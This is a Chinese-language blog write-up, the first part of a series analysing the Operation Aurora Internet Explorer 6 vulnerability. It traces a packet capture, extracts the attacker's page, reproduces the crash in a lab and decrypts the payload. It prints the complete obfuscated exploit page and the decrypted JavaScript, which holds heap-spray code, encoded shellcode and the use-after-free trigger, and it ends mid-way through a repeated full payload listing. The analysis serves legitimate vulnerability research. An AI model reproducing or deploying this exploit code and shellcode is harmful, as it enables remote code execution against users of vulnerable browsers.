目录

极光行动漏洞分析-提取样本


文章链接
极光行动漏洞分析 1:提取样本
极光行动漏洞分析 2:漏洞成因分析

1. 极光行动介绍

来自百度百科
极光行动(Operation Aurora)或欧若拉行动是2009年12月中旬可能源自中国的一场网络攻击,其名称“Aurora”(意为极光、欧若拉)来自攻击者电脑上恶意文件所在路径的一部分。遭受攻击的除了Google外,还有20多家公司:其中包括Adobe Systems、Juniper Networks、Rackspace、雅虎、赛门铁克、诺斯洛普·格鲁门和陶氏化工。这场攻击过后,Google提出了它的新计划:它将“在必要的法律范围内”,于中国运营一个完全不受过滤的搜索引擎;同时Google也承认,如果该计划不可实现,它将可能离开中国并关闭它在中国的办事处。

此漏洞是基于 IE6.0 的一个经典漏洞。可能因为某些原因,这个漏洞的分析报告出奇的少,能搜索到的绝大多数是如何利用的 PoC,抱着对漏洞成因的好奇,于是对该漏洞来了一次详细分析。

其实这个漏洞开始我是不知道的,是因为 @老刘 发来一个流量包,而这个流量包里就是受害者用 IE6.0 访问攻击者恶意构造的网站后,触发此漏洞的一个场景。所以最开始对此漏洞是一无所知的,这里我是将从拿到流量包并分析提权样本分析漏洞成因利用此漏洞这几个步骤一一记录下来,算是对整套分析流程做个记录。


2. 流量包分析

既然只有流量包,那就只能从流量包入手。在这里需要提醒一句的是,因为这个流量包是有人故意做的一个流量包,所以这个流量包是比较干净的,也就是里面就只有与这个漏洞相关的流量,相对来说分析起来较为容易。如果是在真实环境中,抓取到数据包可能是杂乱无章的,这样的情况就很考验流量分析的技术了。我们这里是为了分析漏洞,所以只对流量做简单分析即可。

2.1 流量的大概内容

打开流量包之后,可以看到这个包中只有HTTPTCP两种类型的数据包 。

/images/极光行动漏洞分析-提取样本/0365c5c767ee7650aa9955ebccc2428bd7cc26feda66d92cee0ae51b18bef4d5.png
流量大概内容

2.2 查看协议分级

从协议分级中可以查看到,TCPHTTP协议占用了大部分的数据包

/images/极光行动漏洞分析-提取样本/836f6be306db58fa8675a1079b96bdaf763fd7441e42df79f3f2e2efe08cca9f.png
协议分级

2.3 查看对话

对话窗口可以看出只有两个会话

/images/极光行动漏洞分析-提取样本/ebd067b6dfdaed090f1c3bb82949264ebe5b5540e0fdb7e3d133df202a0c5513.png
查看对话

2.4 过滤对话

对话窗口设置过滤器

/images/极光行动漏洞分析-提取样本/7a9bee420d53b9abe7bd5d07228b57c9adee3bd196ca43e3e0dd1c6223a0b3f1.png
设置过滤器

2.5 追踪流

在过滤后的流量中,选择追踪流,可以将当前流量显示成可直观观察的流量。但需要注意一点的是:需要根据当前过滤的数据包协议来选择追踪哪个流,例如我这里过滤的TCP的协议,那么追踪时就追踪TCP流。假如过滤是其他协议,例如HTTP协议,就需要选择追踪HTTP流

/images/极光行动漏洞分析-提取样本/ea00130973a220197e595c24e972608d7e64af5f7b3076ed0afe66fed2e30b2e.png
追踪TCP流

过滤的流量中有两个完整的流,分别如下:

  • 流0:
    /images/极光行动漏洞分析-提取样本/a092e65e628b16f2883c154f7deca35bfd19367465719f246728eb9665ca2188.png
    追踪流0
  • 流1:
    /images/极光行动漏洞分析-提取样本/abea4178b6ff5ec685c0f2f68c1e93b81a27b44da4f259b77a6d294be82f6491.png
    追踪流1

可以看到流0是一个访问Web的对话,流1则看上去像是Windows命令行中执行了命令


3. 提取样本

通过上面两个流的内容来看,可以猜测是受害者访问了攻击者的网页,然后攻击者的网页执行了Windows命令(对攻击比较敏感的话一眼就能看出来了)。接下来就需要提取出攻击者的攻击样本,然后对此样本进行分析。

3.1 对流0进行分析

流0的流量进行分析,可以看到很明显只有一个网页访问,该网页可能就是攻击者的恶意页面

/images/极光行动漏洞分析-提取样本/a306d9b94446ef8d5a56340a23cf65e3ddb73a04a790817830f90a6df857664b.png
对流0的分析

3.2 提取样本

/images/极光行动漏洞分析-提取样本/f7f8df01fc7db4f3daeb66387fbf29991358bcfb11a7e4ef29fd69da5e625a58.png
提取样本

最终提取出的网页内容是这样的:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN">
<html>
<head>
<script>
	var IwpVuiFqihVySoJStwXmT = '04271477133b000b1a0c240339133c120e2805160e1503684d705005291a08091b3e6e713e1122520b03123d051808392c0d27123b0a0805033c1c0735321a2407350314142935250829083c0a0000072f142624011f2a27022825082f253f2c39394a716a2615275207142524357d43772c2702705a2f466a657c6e4a256a7450614176566c65257e4165310515150a0f2b35302a103d0e03041e0234362f3a3c34073e1b0d0d02131e3f1635200e21101c38093913112e322223211f3239302133381b330a0c2c1175576c2e2713251f2308236b2f270f2d3e2d353c172b03393164031d192b1e363c012f072d311538230f2e113979490b03123d051808392c0d27123b0a0805033c1c0735321a2407350314142935250829083c0a0000072f142624011f2a27022825082f253f2c39393125176614310627466a656e0d3a3968730d261334463b1122303b07052d3d3705303e36340f05131d0b2934142b070d33657175043926244b261334461d362b31063d3e00263e1c110f11080f250e340020150110220c1e111c3d0e273f3a3a21050f2b2208341f04042c684d701c231177043e270b3562614b26133446220e083e1c0d0e1b3d1d31362b271221170036001a240230092e222638383d152b1a23162b0d3330230b14053e3e3c1a321537122d27043a30271d2439383b121f160a033e1c211e383f203e3e143136190210081f2c1e231603112d363975576c3f261523112716327e2a20042f3e211f3e5221212e233d131c0f1318223d2a24080212361718392626070a24072c27102533210823092a15390917190d3e3310250d0c04053d04173d1c0f212b180820333c382d3e3d2036000921320a1c36371e4e7e3e3a34186c271f1707352e1f260a1a2d281c3b3c1e113411272e3d2419043d080611023c280d1c3318332b3b1c3d061f0b050810103b173a160f32230a060d16260216001c1c05684d70070d223c330d113901070b001d02110b152f361f3818180a3f180725123a121534381f0c113b05152021162a3e211e26282f012408242e381f27020605220124293309293c3321011a033a040822143533003f08000e22392c35270835137f656b701f2a727c4175077f5565726920537b782e55254b7f52366039610b75286d05364b7255723078305e2e6f3d49624b76432223746108693f7b47694063136423756c4f392c7d49695733526f7c7d701f75287b167507725f632369205e29797f5525417152616039315c78786d05644a720372302a6d592a6f3d44364b774322767b6153693f7c4164136313637c2a314f3973704966573355602328701f782b7c1175077f506e7469205e7b7e7a55254623526460396c08787d6d0569107f5672302a6d597b6f3d1669462743227129665d693f2e13364763136e762a364f397e29433657335460717f701f75727c16750722506e726920537b2c7d55254b7752646039615b78726d0536477f5672302a365e746f3d4436147f4322777b315c693f7c116245631331217e624f392c7d4963573300337174701f75727116750772076e7569205e742c7d5525467f00336039615375796d05644a74517230756d53756f3d43364b2443227c7d6c59693f2c46644a631331217f334f397e7a4469573354602328701f752c714075072002647269205e7d797f55254b7f5f6460396c5d78796d05364775517230756d5e7d6f3d493240714322767b6c59693f7141644063136e7475634f397e7044675733006f2374701f2a2e7c48750772556e776920592a73795525462452646039615a787d6d056942200572307566592a6f3d496840714322777b610c693f7c4963456313637575674f397e794236573352357c7d701f2a727b16750772506e7c69205e7b7e7155254b705f6660396c5378736d056442725772307567592a6f3d42674b754322717f3352693f7c41694a6313317d756c4f397370496957335260712d701f78737c407507725e6e7769205e297e7e55254b77003460393352787b6d05644a7f507230756d5e296f3d426714224322712a6c58693f71466941631363762a6d4f39732e16655733006f7c7f701f2a2e2c4675072250637c69205e2d7e7e5525467f5f666039330e75726d0564452250723075375e7f6f3d16684b754322712e3353693f7c15644b6313632478634f397e7b446857330062717c701f787971487507750063276920537c7e7e55254624556060396158787b6d0563457f5f7230756c5e2a6f3d44314b714322232f6c5a693f7c1163146313637c75374f39797f496357335231767b701f782b711275077400637c69205e7c7e7b55254b2052656039610b2a726d056245725672302a3153756f3d166514224322767b615d693f7c4069406313647278624f39737b146657335f6f717a701f757c714975077500652369205e7b2c70552514255f6660396c5d75286d053647205e723028635e7b6f3d4463147f4322717f615d693f7c11634563133126786d4f397378423657335f352328701f78737c4275077451317c6920587b73795525467e5f316039615975726d0564417f5672307564537f6f3d49694171432223796c58693f7c49644063136e7378374f397379496357335f65772a701f75787c1275077551637d6920582a732a5525417154316039615b78286d056945725772302a360c756f3d4469147f4322217a335f693f714136116313637378664f397e7916345733006f7c7f701f7f7d7a47750772046e766920582a787f55254b765f3160396152787d6d05644b200272307562582a6f3d163446774322717b6c08693f7b4764406313637d2a6d4f397379446657335264217a701f75287a477507725731216920537f7e705525407152656039665d757c6d05364a205f72302a315e756f3d43364b7643227c7a6c5a693f71406944631331702a314f39782e496957335f6f2328701f2a2e2e147507725565236920537a2e7e55254b7552656039330978786d0564137f5e723078305e7e6f3d496246754322717b675d693f71436910631363722a314f397e79496357335236762a701f7f2c714175077f546e276920537d7e715525147f006f6039335f75286d05644a725f72307865532e6f3d49674b704322712e610c693f7147694563133170786d4f39737844615733526e7174701f757b7c4175077451637669205e7a2c7d552541715f6e6039335f78736d0569407f5472302a60537e6f3d44634b7443227c7c6153693f2e49644b6313637575674f397e784960573355312375701f782b2e1475077400637c69205e7e7e7b552546705f6060396c5c757d6d0569457251723078665e296f3d4962147e4322717b615b693f7b47364a63136e277e334f397e7e1466573355607c7d701f2a2e71477507725e6e2369200e7a737b552540205f616039665d757d6d056443200572302a6d537e6f3d16334b754322217a6c53693f7c4769406313637475374f39792e4432573352317c7c701f75282e147507725f642369200c282c7d55251473526660396159752c6d05364b205372307565532e6f3d44324b7f43227c7c6c59693f2e1469436313657278634f39737049365733526e717e701f757d2e487507725e6e7269205e7b792e55254b755560603933097f2c6d05364b200272307830582a6f3d4462147e43222375670c693f7146694263136e7575634f397e71146657335f317c2a701f757a714875077f56637569200c75737955254624546060396c0c757b6d056413725e7230786d0c746f3d4336467543227c75665d693f7c41344463136e7c78344f397e7a4432573352357c7a701f757b7c467507725e317d69200c74737b55254671543160396c527e2c6d05644b7f57723078675e7d6f3d493246744322717a6c08693f7c4263146313632378304f39737f496257335f657c7a701f2e2c714875072751672769205e2d2c2a5525167e0235603936537e736d056746225f72302a6158786f3d443210774322767d600b693f794267136313322474664f397a7b16335733076e727d701f2e2c79497507715767716920087e727155254a73006e603931082f2f6d0567137e0572307d36582a6f3d1663172343227728360b693f7e4763116313662675304f392f7b166057330734237e701f2d7b7f1275077451327369205c297a7155254a20566f603961522d7d6d0561427451723079605a7a6f3d14621724432277756553693f7846364463136675296c4f397f2a4369573353622074701f757e7a4475077603357d69205a7b787a55254127543460396c5e7b7c6d053511720272302d610c2f6f3d486941734322707d3659693f714068146313347c7d664f392e2a4864573350667d2e701f2a282b427507275036246920097b7b7955251175036260393759297b6d056047205172307f3759746f3d466911704322757e6c5c693f7e4735446313637629624f39737f1361573304317c7e701f7e7f7b4175077104367169200c7d7e2a55254b2354666039625829286d0567137f57723079635a286f3d406846714322747f655b693f7d466011631336777c634f392f2b136157335431767e701f7e782d4475077004357669200f7a297a5525407e5f316039370f7a286d056917725372302d6553786f3d473640744322242d665a693f714433436313317478674f397f714834573356367274701f2a7c7c157507715f672769205f757d2b552543730760603964582f296d053543705772307c6c597f6f3d473416734322277e360b693f7d476247631332737c6c4f39292e476557335e602774701f7c2c791575077354637169205f2a28785525422203366039665a7b7a6d0536177207723079345b746f3d42614673432273796652693f7c11681463136e2328674f39287d4568573305637d2d701f792e7d4275077652347d69205d2a7d7b5525177452626039630c7d736d053211765572307d6308796f3d436642234322217a675d693f7b426847631362267a624f39297a426957335f62777a701f287a7c447507735333236920522d7b7b5525447f51616039345b742f6d053614715072307a6559786f3d4967407643227079665c693f7b486044631335752f6c4f392c79413357335135702a701f2a2f7c12750771046f2369200b74722a5525452405626039650929796d0562142402723079665b7a6f3d4533447e4322267a6d08693f7b456940631363757b334f39282a163157330761247a701f787e2945750775506f216920537e732955251025036f60396c5a292b6d056716775e706c77230b3e6a3d1136050e2131121938122703291d704f66131c0127232b0819053d13020b1600280e3f1006181c22123d0e1334312102332d181b360939130131020d3a18383e22123703321c350d230f011b26011819263f27180a272307183a07001c0a340024101b2f2e192e26033437311c24306475486968685b70503344776e6c775a6e6a6350721164467c656e65486c6168523450664d77676920486c6168526050664d77672f774a676a6a4072526d4675216e7543772e27502b523307313204120c1b1f25083b3b270b776e71751f2d2c3f38171411333a3d271c0b216a3550271a2f0a326d6c200b2a3d00373625130b2f2e05340762262d1e37062e466b657c2d0e7c7a7840705b7d0038376c7d396c7768406b5215466b657d605a776a1b5b7b5b662c242228391b38021e1e3e252f201a063c311206222d2132162c2f031524310139380201273b0b131a3d063b222a111b2d704f661336233b1d2d2a1d1d1d28190f073a656775071b2d1f37380b3729013d0e051b3824093607333f1e3f09222428022b1a3e3e190d1003230d223c393c0709131c013320071c0f2f361912041b0237210d103a052577372e053e11320f382b6c02033f2d0d17043c0300360a023001093b293d293313271b09010c3d6429380a3e331c0e1021381a021809062306350a34331c29100c0f0b183b1d173c122714223a21180d03033a002e0e3c2a34163d1c30610b37353f0026033a16331c182528321c13312d073e2006223d1226113836333e230711030d100d3b1f03082e2523363c2d083e1d3f12032c3f14310d01282409243a3b2a2c032d102f38120e262e35085a6f5d3b1122303b07052d3d3705303e36340f05131d0b2934142b070d336571750e23293d1d351c3248343729341e290f3e153e0609043d202f21422f3a321e11282e213331033d3e0f041b26173e14020e200933290d1a033d35083216062b231e3e0b013b1a221a2e0d383d0f023a366373143f11330b322b387b0d293e0d1c351f23082307351c0e64683e18012b0025232a083b25361f07052833200a1316360327050211183a38290c160a0f1d24163e19143c0a1536111029101e24090f1402062f2f0e67657b0322242d0218260b2a77786c7748773d211e341d31482420381c04382f3a06311e6e08363c261b1f1f242b1e2835280e0d0106272f142b3c23141936097b6579654377372e053e11320f382b6c3b0b35200605031c25082f02223d3008003a3508133235132e3c3a42653138506d52643a22752f650c103f781360161a1367267c3136397a2b40342e3356347528091f7c2978140c077605672110205a2f7a2c2c2542255633193965097c2e1405601176020b307c365a28163d403342223a22752f650e103f781360161a1367267c3136397a2b40342e3356347528091f7c2978140c077605672110205a2f7a2c2c2542255633193965097c2e1405601176020b307c365a28163d403342223a22752f650e103f781360161a1367267c3136397a2b40342e3356347528091f7c2978140c077605672110205a2f7a2c2c2542255633193965097c2e1405601176020b307c365a28163d403342223a22752f650e103f781360161a1367267c3148772c2702705a2f466a657c6e4a256a74501d17031e1e082e200c091d0a391c1c1420270c212c121e1e1f371500050a2e352e302838301802113b05053f1139330706123d0a39312e0f222962390f222d3c186b522f4d7c6c37180f0932013d3207202300070519041e0c38393d0b3e3403120b10180f263100321704122d153e14230f29202425142b2c0f30363c2924233d1c0b1b1b48332438344a716a384b2d04271477316c684a201e2615013909031a223b23322d3b0b2029230707130115140128643b0233372a033a2022215131';
	var RXb = '';
	for (i = 0;i<IwpVuiFqihVySoJStwXmT.length;i+=2) {
		RXb += String.fromCharCode(parseInt(IwpVuiFqihVySoJStwXmT.substring(i, i+2), 16));
	}
	var vuWGWsvUonxrQzpqgBXPrZNSKRGee = location.search.substring(1);
	var NqxAXnnXiILOBMwVnKoqnbp = '';
	for (i=0;i<RXb.length;i++) {
		NqxAXnnXiILOBMwVnKoqnbp += String.fromCharCode(RXb.charCodeAt(i) ^ vuWGWsvUonxrQzpqgBXPrZNSKRGee.charCodeAt(i%vuWGWsvUonxrQzpqgBXPrZNSKRGee.length));
	}
	window["eval".replace(/[A-Z]/g,"")](NqxAXnnXiILOBMwVnKoqnbp);
</script>
</head>
<body>
<span id="vhQYFCtoDnOzUOuxAflDSzVMIHYhjJojAOCHNZtQdlxSPFUeEthCGdRtiIY"><iframe src="/infowTVeeGDYJWNfsrdrvXiYApnuPoCMjRrSZuKtbVgwuZCXwxKjtEclbPuJPPctcflhsttMRrSyxl.gif" onload="WisgEgTNEfaONekEqaMyAUALLMYW(event)" /></span>
</body>
</html>

4. 验证样本

从上面的样本可以看到,有一大堆的乱七八糟的JavaScript代码,如果懂JavaScript的话可以直接对代码进行分析。我这里不太懂JavaScript,所以我是直接搭建的环境,然后用IE6.0进行测试。

4.1 环境搭建

搭建一个Web服务器,将恶意网页放在index.html中,模拟攻击者

/images/极光行动漏洞分析-提取样本/51a3d95841aba982cab2317cae5c66276bfd3f31c5180710e7830378d9ae5eff.png
环境搭建

4.2 模拟受害者

模拟受害者,使用IE6.0访问恶意网页

/images/极光行动漏洞分析-提取样本/1d17f07b9ed2a72fc607bc38150c15ae3430c70e655dc856c70268bfb7d19ad8.png
访问恶意网页

4.3 代码简单分析

使用IE6.0访问了恶意网页之后,并没有任何反应,从直觉上我感觉没有触发漏洞,应该是哪里搞错了。简单分析了下这个JavaScript代码,如下:

/images/极光行动漏洞分析-提取样本/75202c56db00ddd9f66bba3db59f6db74861f5875f8459b98c02dbcdf509edcb.png
代码分析

从上面分析中可以得知,这个恶意脚本获取了访问URL的参数,所以可能加上参数才能触发漏洞

4.4 寻找参数

在刚才的追踪流中寻找参数

/images/极光行动漏洞分析-提取样本/72afc0d77b48a59ac804014305a165c91dab53630e1bf0fe37862fbae98eb795.png
寻找参数

可以看到在访问恶意网页的时候的确有参数:rFfWELUjLJHpP

4.5 触发漏洞

重新加上参数访问恶意网页

/images/极光行动漏洞分析-提取样本/04d86904dfc76119936fc9e300bfb2b25aa1d1dbddaca34bdb7ca7453a71fb64.png
触发漏洞

可以看到,在加上参数后访问提取出来的页面,IE崩溃了,说明此样本是可以触发漏洞的


5. 解密样本

从上面的操作来看,很明显提取的网页是一个加密Payload,而URL后的参数则是解密的密钥,接下来就需要用参数将加密Payload给解密出来。

如何解密样本呢?我的思路是在代码解密后、代码执行前,将解密出来的内容保存成文件。其实也不用这么麻烦,直接输出解密后的内容也是可以的,不过当时没有这么做。对恶意页面进行修改后,如下:

/images/极光行动漏洞分析-提取样本/1f52a2f7a4e2dacccd749f743c1d317afce35abf23762f5e05555486666f2ac3.png
修改页面

修改了之后再带上参数进行访问即可得到解密后的内容

/images/极光行动漏洞分析-提取样本/06673eaf4931b3c05074e8e49cc1c13fb1e9fa46bd1f1cce84595555619abeaf.png
得到解密样本

解密后的Payload如下:

/images/极光行动漏洞分析-提取样本/948001d3207b7dc788672a086ae0726f50cc93e1d8ff6d690498a89981935c6b.png
解密后的Payload

将其进行美化,就得到解密后的JavaScript代码

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
var VwUaVFlsiaztYmICdYI = "COMMENT";
var MeExIMbufEWBILnRFpImyxRTWGErClypbeBtzPrAICchTufmJXuziChiul = new Array();
for (i = 0; i < 1300; i++) {
	MeExIMbufEWBILnRFpImyxRTWGErClypbeBtzPrAICchTufmJXuziChiul[i] = document.createElement(VwUaVFlsiaztYmICdYI);
	MeExIMbufEWBILnRFpImyxRTWGErClypbeBtzPrAICchTufmJXuziChiul[i].data = "XPu";
}
var lTneQKOeMgwvXaqCPyQAaDDYAkd = null;
var JsgdlqtHVnnWiFMCpdxJheQbdjITPhdkurJqwIMuMxJnHf = new Array();
var uKDkvADSMMCpMpWmBjzJRTRBOHuctmWYaRSFYKUgfGAorttjbgqtzbHoZkWlIhITyAOOkvmTpOpLxrfsUWzDUdnsdEwzsu = unescape;

function gGyfqFvCYPRmXbnUWzBrulnwZVAJpUifKDiAZEKOqNHrfziGDtUOBqjYCtATBhClJkXjezUcmxBlfEX() {
	var mWgWGhyqOVxBPqtnAFWAyxhLnqBNaRNnkKvTfAwVuvOyCnGUwBPZEzSZtKpqGZUvPO = uKDkvADSMMCpMpWmBjzJRTRBOHuctmWYaRSFYKUgfGAorttjbgqtzbHoZkWlIhITyAOOkvmTpOpLxrfsUWzDUdnsdEwzsu('%uf841%u9327%u972f%u994a%u4a9b%uf943%u4e4b%u9290%uf84b%u3792%u3f99%uf599%u4891%u9b3f%u494f%u4e37%u3746%ud642%u484e%uf83f%u4f91%u3749%u414a%u49fd%u9896%u37fd%u4a4a%u9691%u4742%u4e43%u9b47%u9b90%uf837%uf94a%u4e37%ufcf5%u93fc%u4a3f%u2743%u984f%ud697%u97f5%u9143%u4148%uf590%ufc48%u4ff9%u27d6%u4a27%ufd27%uf593%ufd48%u989f%u4a90%u48f5%u49fd%u4993%u4827%u9899%u3f9b%u9193%ud648%ufd3f%u4249%u27fd%u9f90%ufd37%u4137%u9993%u9743%uf537%u9841%u9b27%u3793%u9142%u9196%u4847%uf8f8%ufd48%u4392%u3f91%u4b43%u4047%u90fc%u933f%u9827%u274f%u4937%u4092%u412f%u4b91%uf83f%u4699%u4749%u9691%u9949%u4041%u923f%u2793%u43f8%u4198%uf899%u9899%u474a%u4940%u4892%u4e46%u91fc%uf841%u4896%u984e%u27fd%u4f92%u9693%u43f8%u9ff5%uf893%ufdd6%ud649%u4a46%u4991%ufd98%u47d6%u9b43%uf893%u4bf9%u4e49%u4a46%u4348%uf540%u4398%u3f4b%u9046%u4b37%u4241%u3799%u994f%u4a97%ufc90%u4a3f%u499b%u3793%u4f37%u4a9b%u2f49%u4043%u9f42%u4af8%u2740%ufd99%uf5fd%u3747%u4092%u3747%u93d6%u9846%u9699%u3f2f%u47f8%ufc91%u979b%uf5f8%ud647%u43f9%u4347%u4a37%ufc48%u902f%u9bfd%u4942%u27f9%u2791%u489f%u4398%u4390%u9193%u9937%uf592%u4942%u964b%u9193%u922f%u924b%u3748%u2f9b%u372f%u414b%u9741%ufcf9%u49f9%ud6f5%u91fc%u4643%u41fd%uf893%u3727%u4b93%u2f27%u909f%u4847%u49fd%u972f%ufd41%u479b%u3742%u48f8%u9146%u43d6%u9b27%u41fd%u9348%u2742%u3796%uf8f9%ufd49%u3f90%u9690%u9096%uf5fd%u2f99%u98fd%ufdfd%u432f%u96d6%u9342%ufc42%u4a98%u4e42%u9243%u4727%u939b%u47fd%u4193%u4a3f%u3f91%u929b%u9149%uf9f8%uf59b%u4849%u409b%u9796%u4b4f%u9797%uf548%u9041%u4948%u9141%u2743%u46f5%u3799%uf549%u9292%uf592%u4392%u9049%uf949%u4092%u4090%u3ff9%u4afd%u2f49%u4243%u4697%u9697%u9747%u434e%u92f8%u4741%u37f8%u9b2f%u46d6%u3791%ufd97%u489f%ud693%u2f96%u3797%u41fc%uf892%ufc93%ud699%u4792%u419b%u3f4b%u4f90%u9bfd%u493f%ufdf5%uf541%u439f%uf9f5%u909b%u4b99%u9093%ufd91%u2746%u989f%u4942%u97f8%u4897%u473f%u9337%ufc3f%uf9fd%u4e2f%u42f8%uf92f%u9690%u9096%u49d6%u9f9f%u9098%u9040%uf991%u4b27%u9f91%u4a48%u48f8%u3f43%u9937%u41d6%u994a%u424b%u4b96%u9146%u48f8%uf893%u472f%u982f%u4991%u4241%u9b42%u469b%u423f%u4f4e%u9792%u9296%ubf98%ua70b%u4afb%ud8db%uc929%u74d9%uf424%u4bb1%u315a%u127a%uea83%u03fc%ua971%ubf19%u7104%ub289%u85f9%udbce%u7a8c%u1c2f%uf3ee%u2dca%u673c%u1c9e%ue3f0%uacf2%ua17b%u27e6%u6e09%u8f08%u48a7%u1027%u5506%ud2eb%u2909%u06f6%u10e9%u5b39%u55e8%u9424%u0eb8%u0722%u3a2c%u9476%uec4d%ua4fc%u8935%u51c3%u908f%uc913%udb84%u618b%ufbc2%ua6aa%uc711%uc3e5%ub3e1%u05f7%u3b38%u69c6%u0296%u67e6%u43e7%u97c1%ubf92%u2531%u7ba4%uf14b%u9e21%u72eb%u7a91%u560d%u0847%u1301%u560c%ua206%uecc1%u2f32%u22e4%u6bb3%ue6c2%u289f%ube6b%u9e45%ua094%u7f22%uaa30%u94c1%uf142%u598d%u0a78%uf64e%u790b%u597c%u15a7%u12cc%ue161%u0933%u7dd5%ub2ca%u5725%ue609%ucf75%u87b8%u0f1e%u5244%u5fb0%u0dea%u3070%ufe4a%u5a18%u2145%u6538%u4a8f%u9fd2%ub558%uc48a%u5d52%u04c8%u7f73%ue245%u6f19%ubc03%u16b5%u360e%ud627%u3285%u5c67%uc229%u9526%ud044%u55df%u8a13%u6976%ua18e%uff76%u6034%u9720%u5536%u3806%ub0c9%uf11c%u7b5f%ufe4b%u7b8f%ua88b%u7bc5%u0ce3%u2fbd%u5316%u5c68%uc68b%u3592%u407f%ubbfa%ua6a6%u44a5%u368d%u929a%ubce8%u90ea%u7d18');
	var uafwHGfWUmxkIam = uKDkvADSMMCpMpWmBjzJRTRBOHuctmWYaRSFYKUgfGAorttjbgqtzbHoZkWlIhITyAOOkvmTpOpLxrfsUWzDUdnsdEwzsu("%" + "u" + "0" + "c" + "0" + "d" + "%u" + "0" + "c" + "0" + "d");
	do {
		uafwHGfWUmxkIam += uafwHGfWUmxkIam
	} while (uafwHGfWUmxkIam.length < 0xd0000);
	for (S = 0; S < 150; S++) JsgdlqtHVnnWiFMCpdxJheQbdjITPhdkurJqwIMuMxJnHf[S] = uafwHGfWUmxkIam + mWgWGhyqOVxBPqtnAFWAyxhLnqBNaRNnkKvTfAwVuvOyCnGUwBPZEzSZtKpqGZUvPO;
}

function WisgEgTNEfaONekEqaMyAUALLMYW(cpznAZhGdtOhTCNSVGLRdYeEfCAPKMeztpQnoKTGKsjrhhkoxCWPz) {
	gGyfqFvCYPRmXbnUWzBrulnwZVAJpUifKDiAZEKOqNHrfziGDtUOBqjYCtATBhClJkXjezUcmxBlfEX();
	lTneQKOeMgwvXaqCPyQAaDDYAkd = document.createEventObject(cpznAZhGdtOhTCNSVGLRdYeEfCAPKMeztpQnoKTGKsjrhhkoxCWPz);
	document.getElementById("vhQYFCtoDnOzUOuxAflDSzVMIHYhjJojAOCHNZtQdlxSPFUeEthCGdRtiIY").innerHTML = "";
	window.setInterval(nayjNuSncnxGnhZDJrEXatSDkpo, 50);
}

function nayjNuSncnxGnhZDJrEXatSDkpo() {
	p = "\u0c0f\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d";
	for (i = 0; i < MeExIMbufEWBILnRFpImyxRTWGErClypbeBtzPrAICchTufmJXuziChiul.length; i++) {
		MeExIMbufEWBILnRFpImyxRTWGErClypbeBtzPrAICchTufmJXuziChiul[i].data = p;
	}
	var t = lTneQKOeMgwvXaqCPyQAaDDYAkd.srcElement;
}

将之前未解密的代码删除,换成解密后的代码,然后进行访问,可以看到也是可以成功的:

/images/极光行动漏洞分析-提取样本/5b45629c75be300fc6f26cc520891190c4152c1295fd076e9e09be0121136ec0.png

最终的完整Payload如下:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN">
<html>
<head>
<script>
var VwUaVFlsiaztYmICdYI = "COMMENT";
var MeExIMbufEWBILnRFpImyxRTWGErClypbeBtzPrAICchTufmJXuziChiul = new Array();
for (i = 0; i < 1300; i++) {
	MeExIMbufEWBILnRFpImyxRTWGErClypbeBtzPrAICchTufmJXuziChiul[i] = document.createElement(VwUaVFlsiaztYmICdYI);
	MeExIMbufEWBILnRFpImyxRTWGErClypbeBtzPrAICchTufmJXuziChiul[i].data = "XPu";
}
var lTneQKOeMgwvXaqCPyQAaDDYAkd = null;
var JsgdlqtHVnnWiFMCpdxJheQbdjITPhdkurJqwIMuMxJnHf = new Array();
var uKDkvADSMMCpMpWmBjzJRTRBOHuctmWYaRSFYKUgfGAorttjbgqtzbHoZkWlIhITyAOOkvmTpOpLxrfsUWzDUdnsdEwzsu = unescape;

function gGyfqFvCYPRmXbnUWzBrulnwZVAJpUifKDiAZEKOqNHrfziGDtUOBqjYCtATBhClJkXjezUcmxBlfEX() {
	var mWgWGhyqOVxBPqtnAFWAyxhLnqBNaRNnkKvTfAwVuvOyCnGUwBPZEzSZtKpqGZUvPO = uKDkvADSMMCpMpWmBjzJRTRBOHuctmWYaRSFYKUgfGAorttjbgqtzbHoZkWlIhITyAOOkvmTpOpLxrfsUWzDUdnsdEwzsu('%uf841%u9327%u972f%u994a%u4a9b%uf943%u4e4b%u9290%uf84b%u3792%u3f99%uf599%u4891%u9b3f%u494f%u4e37%u3746%ud642%u484e%uf83f%u4f91%u3749%u414a%u49fd%u9896%u37fd%u4a4a%u9691%u4742%u4e43%u9b47%u9b90%uf837%uf94a%u4e37%ufcf5%u93fc%u4a3f%u2743%u984f%ud697%u97f5%u9143%u4148%uf590%ufc48%u4ff9%u27d6%u4a27%ufd27%uf593%ufd48%u989f%u4a90%u48f5%u49fd%u4993%u4827%u9899%u3f9b%u9193%ud648%ufd3f%u4249%u27fd%u9f90%ufd37%u4137%u9993%u9743%uf537%u9841%u9b27%u3793%u9142%u9196%u4847%uf8f8%ufd48%u4392%u3f91%u4b43%u4047%u90fc%u933f%u9827%u274f%u4937%u4092%u412f%u4b91%uf83f%u4699%u4749%u9691%u9949%u4041%u923f%u2793%u43f8%u4198%uf899%u9899%u474a%u4940%u4892%u4e46%u91fc%uf841%u4896%u984e%u27fd%u4f92%u9693%u43f8%u9ff5%uf893%ufdd6%ud649%u4a46%u4991%ufd98%u47d6%u9b43%uf893%u4bf9%u4e49%u4a46%u4348%uf540%u4398%u3f4b%u9046%u4b37%u4241%u3799%u994f%u4a97%ufc90%u4a3f%u499b%u3793%u4f37%u4a9b%u2f49%u4043%u9f42%u4af8%u2740%ufd99%uf5fd%u3747%u4092%u3747%u93d6%u9846%u9699%u3f2f%u47f8%ufc91%u979b%uf5f8%ud647%u43f9%u4347%u4a37%ufc48%u902f%u9bfd%u4942%u27f9%u2791%